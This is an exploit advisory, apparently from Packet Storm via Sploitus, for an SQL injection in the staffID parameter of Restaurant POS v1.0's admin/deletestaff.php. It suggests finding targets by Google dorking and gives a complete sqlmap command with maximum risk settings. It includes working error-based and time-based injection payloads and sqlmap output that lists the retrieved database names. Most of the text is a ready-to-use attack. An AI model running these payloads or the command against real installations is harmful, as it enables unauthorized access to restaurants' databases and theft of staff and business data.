Share
## https://sploitus.com/exploit?id=PACKETSTORM:181832
=============================================================================================================================================  
| # Title : Restaurant POS v1.0 SQL injection Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |  
| # Vendor : https://www.hockeycomputindo.com/2021/05/restaurant-pos-source-code-free.html |  
=============================================================================================================================================  
  
poc :  
  
[+] Dorking ฤฐn Google Or Other Search Enggine.  
  
[+] use payload : admin/deletestaff.php?staffID=1  
  
[+] E:\sqlmap>python sqlmap.py -u http://127.0.0.1/bangresto-main/admin/deletestaff.php?staffID=1 --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dbs  
  
  
[+] ---  
GET parameter 'staffID' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N  
sqlmap identified the following injection point(s) with a total of 1823 HTTP(s) requests:  
---  
Parameter: staffID (GET)  
Type: error-based  
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)  
Payload: staffID=1 AND EXTRACTVALUE(5264,CONCAT(0x5c,0x71787a7171,(SELECT (ELT(5264=5264,1))),0x7162787071))  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: staffID=1 AND (SELECT 3481 FROM (SELECT(SLEEP(5)))frXm)  
---  
[22:32:22] [INFO] the back-end DBMS is MySQL  
web application technology: PHP 8.0.30, Apache 2.4.58, PHP  
back-end DBMS: MySQL >= 5.1 (MariaDB fork)  
[22:32:22] [INFO] fetching database names  
[22:32:22] [INFO] starting 7 threads  
[22:32:22] [INFO] retrieved: 'bangresto'  
[22:32:22] [INFO] retrieved: 'cms'  
[22:32:22] [INFO] retrieved: 'phpmyadmin'  
[22:32:22] [INFO] retrieved: 'mysql'  
[22:32:22] [INFO] retrieved: 'test'  
[22:32:22] [INFO] retrieved: 'information_schema'  
[22:32:22] [INFO] retrieved: 'performance_schema'  
available databases [7]:  
[*] bangresto  
  
  
[*] ending @ 22:32:22 /2024-08-16/  
  
Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================